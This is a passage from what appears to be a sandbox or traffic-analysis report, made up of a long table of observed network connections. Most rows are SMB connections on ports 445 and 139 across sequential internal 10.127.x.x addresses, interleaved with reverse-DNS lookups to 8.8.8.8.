| N/A | 10.127.1.30:445 | tcp | |
| N/A | 10.127.1.30:139 | tcp | |
| US | 8.8.8.8:53 | 140.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.31:445 | tcp | |
| N/A | 10.127.1.31:139 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.144:139 | tcp | |
| US | 8.8.8.8:53 | 141.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.32:445 | tcp | |
| N/A | 10.127.1.32:139 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| US | 8.8.8.8:53 | 143.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.145:139 | tcp | |
| N/A | 10.127.1.33:445 | tcp | |
| N/A | 10.127.1.33:139 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.1.34:445 | tcp | |
| N/A | 10.127.0.146:139 | tcp | |
| N/A | 10.127.0.147:139 | tcp | |
| N/A | 10.127.1.34:139 | tcp | |
| N/A | 10.127.1.35:445 | tcp | |
| N/A | 10.127.1.35:139 | tcp | |
| N/A | 10.127.1.36:445 | tcp | |
| N/A | 10.127.1.36:139 | tcp | |
| N/A | 10.127.1.37:445 | tcp | |
| US | 8.8.8.8:53 | 144.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.37:139 | tcp | |
| N/A | 10.127.1.38:445 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.1.38:139 | tcp | |
| N/A | 10.127.0.148:139 | tcp | |
| US | 8.8.8.8:53 | 145.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.39:445 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.1.39:139 | tcp | |
| US | 8.8.8.8:53 | 146.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.149:139 | tcp | |
| N/A | 10.127.1.40:445 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.1.40:139 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.150:139 | tcp | |
| N/A | 10.127.0.151:139 | tcp | |
| N/A | 10.127.1.41:445 | tcp | |
| N/A | 10.127.1.41:139 | tcp | |
| N/A | 10.127.1.42:445 | tcp | |
| N/A | 10.127.1.42:139 | tcp | |
| N/A | 10.127.1.43:445 | tcp | |
| N/A | 10.127.1.43:139 | tcp | |
| SG | 20.44.239.154:445 | settings-win.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 148.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.44:445 | tcp | |
| N/A | 10.127.1.44:139 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.1.45:445 | tcp | |
| US | 8.8.8.8:53 | 149.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.152:139 | tcp | |
| N/A | 10.127.1.45:139 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| US | 8.8.8.8:53 | 150.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.46:445 | tcp | |
| N/A | 10.127.0.153:139 | tcp | |
| N/A | 10.127.1.46:139 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.1.47:445 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.154:139 | tcp | |
| N/A | 10.127.0.155:139 | tcp | |
| N/A | 10.127.1.47:139 | tcp | |
| N/A | 10.127.1.48:445 | tcp | |
| N/A | 10.127.1.48:139 | tcp | |
| N/A | 10.127.1.49:445 | tcp | |
| N/A | 10.127.1.49:139 | tcp | |
| N/A | 10.127.1.50:445 | tcp | |
| DE | 136.243.69.123:445 | tcp | |
| N/A | 10.127.1.50:139 | tcp | |
| US | 8.8.8.8:53 | 152.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.51:445 | tcp | |
| N/A | 10.127.1.51:139 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| US | 8.8.8.8:53 | 153.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.156:139 | tcp | |
| N/A | 10.127.1.52:445 | tcp | |
| N/A | 10.127.1.52:139 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| US | 8.8.8.8:53 | 154.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.157:139 | tcp | |
| N/A | 10.127.1.53:445 | tcp | |
| N/A | 10.127.1.53:139 | tcp | |
| US | 52.111.227.13:445 | nexusrules.officeapps.live.com | tcp |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.0.158:139 | tcp | |
| N/A | 10.127.0.159:139 | tcp | |
| N/A | 10.127.1.54:445 | tcp | |
| N/A | 10.127.1.54:139 | tcp | |
| N/A | 10.127.1.55:445 | tcp | |
| N/A | 10.127.1.55:139 | tcp | |
| N/A | 10.127.1.56:445 | tcp | |
| N/A | 10.127.1.56:139 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.1.57:445 | tcp | |
| US | 8.8.8.8:53 | 156.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.57:139 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.1.58:445 | tcp | |
| US | 8.8.8.8:53 | 157.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.160:139 | tcp | |
| N/A | 10.127.1.58:139 | tcp | |
| N/A | 10.127.1.59:445 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| US | 8.8.8.8:53 | 158.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.59:139 | tcp | |
| N/A | 10.127.0.161:139 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.1.60:445 | tcp | |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.1.60:139 | tcp | |
| N/A | 10.127.0.162:139 | tcp | |
| N/A | 10.127.0.163:139 | tcp | |
| N/A | 10.127.1.61:445 | tcp | |
| N/A | 10.127.1.61:139 | tcp | |
| N/A | 10.127.1.62:445 | tcp | |
| N/A | 10.127.1.62:139 | tcp | |
| N/A | 10.127.1.63:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.1.63:139 | tcp | |
| US | 8.8.8.8:53 | 160.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.64:445 | tcp | |
| N/A | 10.127.1.64:139 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.164:139 | tcp | |
| N/A | 10.127.1.65:445 | tcp | |
| US | 8.8.8.8:53 | 161.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.65:139 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.1.66:445 | tcp | |
| US | 8.8.8.8:53 | 162.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.165:139 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.1.66:139 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| N/A | 10.127.1.67:445 | tcp | |
| N/A | 10.127.0.166:139 | tcp | |
| N/A | 10.127.0.167:139 | tcp | |
| N/A | 10.127.1.67:139 | tcp | |
| N/A | 10.127.1.68:445 | tcp | |
| N/A | 10.127.1.68:139 | tcp | |
| N/A | 10.127.1.69:445 | tcp | |
| N/A | 10.127.1.69:139 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.1.70:445 | tcp | |
| US | 8.8.8.8:53 | 164.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.70:139 | tcp | |
| N/A | 10.127.1.71:445 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.1.71:139 | tcp | |
| US | 8.8.8.8:53 | 165.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.168:139 | tcp | |
| N/A | 10.127.1.72:445 | tcp | |
| N/A | 10.127.1.72:139 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| US | 8.8.8.8:53 | 166.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.169:139 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.1.73:445 | tcp | |
| N/A | 10.127.1.73:139 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.170:139 | tcp | |
| N/A | 10.127.0.171:139 | tcp | |
| N/A | 10.127.1.74:445 | tcp | |
| N/A | 10.127.1.74:139 | tcp | |
| N/A | 10.127.1.75:445 | tcp | |
| N/A | 10.127.1.75:139 | tcp | |
| N/A | 10.127.1.76:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.1.76:139 | tcp | |
| N/A | 10.127.1.77:445 | tcp | |
| US | 8.8.8.8:53 | 168.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.77:139 | tcp | |
| N/A | 10.127.1.78:445 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| US | 8.8.8.8:53 | 169.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.172:139 | tcp | |
| N/A | 10.127.1.78:139 | tcp | |
| N/A | 10.127.1.79:445 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| US | 8.8.8.8:53 | 170.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.79:139 | tcp | |
| N/A | 10.127.0.173:139 | tcp | |
| N/A | 10.127.1.80:445 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.1.80:139 | tcp | |
| N/A | 10.127.0.174:139 | tcp | |
| N/A | 10.127.0.175:139 | tcp | |
| N/A | 10.127.1.81:445 | tcp | |
| N/A | 10.127.1.81:139 | tcp | |
| N/A | 10.127.1.82:445 | tcp | |
| N/A | 10.127.1.82:139 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.1.83:445 | tcp | |
| N/A | 10.127.1.83:139 | tcp | |
| US | 8.8.8.8:53 | 172.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.84:445 | tcp | |
| N/A | 10.127.1.84:139 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.1.85:445 | tcp | |
| N/A | 10.127.0.176:139 | tcp | |
| US | 8.8.8.8:53 | 173.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.85:139 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| US | 8.8.8.8:53 | 174.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.86:445 | tcp | |
| N/A | 10.127.0.177:139 | tcp | |
| N/A | 10.127.1.86:139 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.1.87:445 | tcp | |
| N/A | 10.127.0.178:139 | tcp | |
| N/A | 10.127.0.179:139 | tcp | |
| N/A | 10.127.1.87:139 | tcp | |
| N/A | 10.127.1.88:445 | tcp | |
| N/A | 10.127.1.88:139 | tcp | |
| N/A | 10.127.1.89:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.1.89:139 | tcp | |
| N/A | 10.127.1.90:445 | tcp | |
| US | 8.8.8.8:53 | 176.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.90:139 | tcp | |
| N/A | 10.127.1.91:445 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.1.91:139 | tcp | |
| N/A | 10.127.0.180:139 | tcp | |
| US | 8.8.8.8:53 | 177.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.92:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.1.92:139 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| US | 8.8.8.8:53 | 178.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.181:139 | tcp | |
| N/A | 10.127.1.93:445 | tcp | |
| N/A | 10.127.1.93:139 | tcp | |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.182:139 | tcp | |
| N/A | 10.127.0.183:139 | tcp | |
| N/A | 10.127.1.94:445 | tcp | |
| N/A | 10.127.1.94:139 | tcp | |
| N/A | 10.127.1.95:445 | tcp | |
| N/A | 10.127.1.95:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.1.96:445 | tcp | |
| N/A | 10.127.1.96:139 | tcp | |
| N/A | 10.127.1.97:445 | tcp | |
| US | 8.8.8.8:53 | 180.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.97:139 | tcp | |
| N/A | 10.127.1.98:445 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.184:139 | tcp | |
| N/A | 10.127.1.98:139 | tcp | |
| US | 8.8.8.8:53 | 181.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.1.99:445 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| US | 8.8.8.8:53 | 182.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.185:139 | tcp | |
| N/A | 10.127.1.99:139 | tcp | |
| N/A | 10.127.1.100:445 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.0.186:139 | tcp | |
| N/A | 10.127.1.100:139 | tcp | |
| N/A | 10.127.0.187:139 | tcp | |
| N/A | 10.127.1.101:445 | tcp | |
| N/A | 10.127.1.101:139 | tcp | |
| N/A | 10.127.1.102:445 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.1.102:139 | tcp | |
| N/A | 10.127.1.103:445 | tcp | |
| N/A | 10.127.1.103:139 | tcp | |
| US | 8.8.8.8:53 | 184.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.104:445 | tcp | |
| N/A | 10.127.1.104:139 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| N/A | 10.127.0.188:139 | tcp | |
| N/A | 10.127.1.105:445 | tcp | |
| US | 8.8.8.8:53 | 185.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.1.105:139 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| US | 8.8.8.8:53 | 186.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.189:139 | tcp | |
| N/A | 10.127.1.106:445 | tcp | |
| N/A | 10.127.1.106:139 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.1.107:445 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.190:139 | tcp | |
| N/A | 10.127.0.191:139 | tcp | |
| N/A | 10.127.1.107:139 | tcp | |
| N/A | 10.127.1.108:445 | tcp | |
| N/A | 10.127.1.108:139 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.1.109:445 | tcp | |
| N/A | 10.127.1.109:139 | tcp | |
| N/A | 10.127.1.110:445 | tcp | |
| US | 8.8.8.8:53 | 188.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.110:139 | tcp | |
| N/A | 10.127.1.111:445 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| US | 8.8.8.8:53 | 189.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.111:139 | tcp | |
| N/A | 10.127.0.192:139 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.1.112:445 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.1.112:139 | tcp | |
| US | 8.8.8.8:53 | 190.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.193:139 | tcp | |
| N/A | 10.127.1.113:445 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.1.113:139 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.194:139 | tcp | |
| N/A | 10.127.0.195:139 | tcp | |
| N/A | 10.127.1.114:445 | tcp | |
| N/A | 10.127.1.114:139 | tcp | |
| N/A | 10.127.1.115:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.1.115:139 | tcp | |
| N/A | 10.127.1.116:445 | tcp | |
| N/A | 10.127.1.116:139 | tcp | |
| US | 8.8.8.8:53 | 192.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.117:445 | tcp | |
| N/A | 10.127.1.117:139 | tcp | |
| N/A | 10.127.1.118:445 | tcp | |
| US | 8.8.8.8:53 | 193.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.196:139 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.1.118:139 | tcp | |
| N/A | 10.127.1.119:445 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| US | 8.8.8.8:53 | 194.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.197:139 | tcp | |
| N/A | 10.127.1.119:139 | tcp | |
| N/A | 10.127.1.120:445 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.198:139 | tcp | |
| N/A | 10.127.1.120:139 | tcp | |
| N/A | 10.127.0.199:139 | tcp | |
| N/A | 10.127.1.121:445 | tcp | |
| N/A | 10.127.1.121:139 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.1.122:445 | tcp | |
| N/A | 10.127.1.122:139 | tcp | |
| N/A | 10.127.1.123:445 | tcp | |
| N/A | 10.127.1.123:139 | tcp | |
| N/A | 10.127.1.124:445 | tcp | |
| N/A | 10.127.1.124:139 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| US | 8.8.8.8:53 | 197.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.200:139 | tcp | |
| N/A | 10.127.1.125:445 | tcp | |
| N/A | 10.127.1.125:139 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| US | 8.8.8.8:53 | 198.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.201:139 | tcp | |
| N/A | 10.127.1.126:445 | tcp | |
| N/A | 10.127.1.126:139 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.1.127:445 | tcp | |
| N/A | 10.127.0.202:139 | tcp | |
| N/A | 10.127.0.203:139 | tcp | |
| N/A | 10.127.1.127:139 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.1.128:445 | tcp | |
| N/A | 10.127.1.128:139 | tcp | |
| N/A | 10.127.1.129:445 | tcp | |
| N/A | 10.127.1.129:139 | tcp | |
| N/A | 10.127.1.130:445 | tcp | |
| US | 8.8.8.8:53 | 200.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.130:139 | tcp | |
| N/A | 10.127.1.131:445 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| US | 8.8.8.8:53 | 201.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.204:139 | tcp | |
| N/A | 10.127.1.131:139 | tcp | |
| N/A | 10.127.1.132:445 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| US | 8.8.8.8:53 | 202.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.132:139 | tcp | |
| N/A | 10.127.0.205:139 | tcp | |
| N/A | 10.127.1.133:445 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.1.133:139 | tcp | |
| N/A | 10.127.0.206:139 | tcp | |
| N/A | 10.127.0.207:139 | tcp | |
| N/A | 10.127.1.134:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.1.134:139 | tcp | |
| N/A | 10.127.1.135:445 | tcp | |
| N/A | 10.127.1.135:139 | tcp | |
| N/A | 10.127.1.136:445 | tcp | |
| N/A | 10.127.1.136:139 | tcp | |
| US | 8.8.8.8:53 | 204.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.137:445 | tcp | |
| N/A | 10.127.1.137:139 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.208:139 | tcp | |
| N/A | 10.127.1.138:445 | tcp | |
| US | 8.8.8.8:53 | 205.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.138:139 | tcp | |
| US | 8.8.8.8:53 | 206.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.1.139:445 | tcp | |
| US | 8.8.8.8:53 | 207.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.209:139 | tcp | |
| N/A | 10.127.1.139:139 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.1.140:445 | tcp | |
| N/A | 10.127.0.210:139 | tcp | |
| N/A | 10.127.0.211:139 | tcp | |
| N/A | 10.127.1.140:139 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.1.141:445 | tcp | |
| N/A | 10.127.1.141:139 | tcp | |
| N/A | 10.127.1.142:445 | tcp | |
| N/A | 10.127.1.142:139 | tcp | |
| N/A | 10.127.1.143:445 | tcp | |
| US | 8.8.8.8:53 | 208.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.143:139 | tcp | |
| N/A | 10.127.1.144:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.1.144:139 | tcp | |
| US | 8.8.8.8:53 | 209.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.212:139 | tcp | |
| N/A | 10.127.1.145:445 | tcp | |
| N/A | 10.127.1.145:139 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| US | 8.8.8.8:53 | 211.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.213:139 | tcp | |
| N/A | 10.127.1.146:445 | tcp | |
| N/A | 10.127.1.146:139 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.1.147:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.214:139 | tcp | |
| N/A | 10.127.0.215:139 | tcp | |
| N/A | 10.127.1.147:139 | tcp | |
| N/A | 10.127.1.148:445 | tcp | |
| N/A | 10.127.1.148:139 | tcp | |
| N/A | 10.127.1.149:445 | tcp | |
| N/A | 10.127.1.149:139 | tcp | |
| US | 8.8.8.8:53 | 212.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.150:445 | tcp | |
| N/A | 10.127.1.150:139 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.1.151:445 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| US | 8.8.8.8:53 | 213.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.216:139 | tcp | |
| N/A | 10.127.1.151:139 | tcp | |
| N/A | 10.127.1.152:445 | tcp | |
| US | 8.8.8.8:53 | 214.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.1.152:139 | tcp | |
| N/A | 10.127.0.217:139 | tcp | |
| N/A | 10.127.1.153:445 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.1.153:139 | tcp | |
| N/A | 10.127.0.218:139 | tcp | |
| N/A | 10.127.0.219:139 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.1.154:445 | tcp | |
| N/A | 10.127.1.154:139 | tcp | |
| N/A | 10.127.1.155:445 | tcp | |
| N/A | 10.127.1.155:139 | tcp | |
| N/A | 10.127.1.156:445 | tcp | |
| N/A | 10.127.1.156:139 | tcp | |
| US | 8.8.8.8:53 | 216.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.157:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.1.157:139 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.220:139 | tcp | |
| US | 8.8.8.8:53 | 217.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.158:445 | tcp | |
| N/A | 10.127.1.158:139 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| US | 8.8.8.8:53 | 218.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.159:445 | tcp | |
| N/A | 10.127.0.221:139 | tcp | |
| N/A | 10.127.1.159:139 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.1.160:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.222:139 | tcp | |
| N/A | 10.127.0.223:139 | tcp | |
| N/A | 10.127.1.160:139 | tcp | |
| N/A | 10.127.1.161:445 | tcp | |
| N/A | 10.127.1.161:139 | tcp | |
| N/A | 10.127.1.162:445 | tcp | |
| N/A | 10.127.1.162:139 | tcp | |
| N/A | 10.127.1.163:445 | tcp | |
| US | 8.8.8.8:53 | 220.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.1.163:139 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.1.164:445 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.1.164:139 | tcp | |
| US | 8.8.8.8:53 | 221.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.224:139 | tcp | |
| N/A | 10.127.1.165:445 | tcp | |
| N/A | 10.127.1.165:139 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| US | 8.8.8.8:53 | 222.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.225:139 | tcp | |
| N/A | 10.127.1.166:445 | tcp | |
| N/A | 10.127.1.166:139 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.226:139 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.227:139 | tcp | |
| N/A | 10.127.1.167:445 | tcp | |
| N/A | 10.127.1.167:139 | tcp | |
| N/A | 10.127.1.168:445 | tcp | |
| N/A | 10.127.1.168:139 | tcp | |
| N/A | 10.127.1.169:445 | tcp | |
| N/A | 10.127.1.169:139 | tcp | |
| US | 8.8.8.8:53 | 224.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.1.170:445 | tcp | |
| N/A | 10.127.1.170:139 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.1.171:445 | tcp | |
| US | 8.8.8.8:53 | 225.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.228:139 | tcp | |
| N/A | 10.127.1.171:139 | tcp | |
| N/A | 10.127.1.172:445 | tcp | |
| US | 8.8.8.8:53 | 226.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.229:139 | tcp | |
| N/A | 10.127.1.172:139 | tcp | |
| N/A | 10.127.1.173:445 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.230:139 | tcp | |
| N/A | 10.127.1.173:139 | tcp | |
| N/A | 10.127.0.231:139 | tcp | |
| N/A | 10.127.1.174:445 | tcp | |
| N/A | 10.127.1.174:139 | tcp | |
| N/A | 10.127.1.175:445 | tcp | |
| N/A | 10.127.1.175:139 | tcp | |
| N/A | 10.127.1.176:445 | tcp | |
| N/A | 10.127.1.176:139 | tcp | |
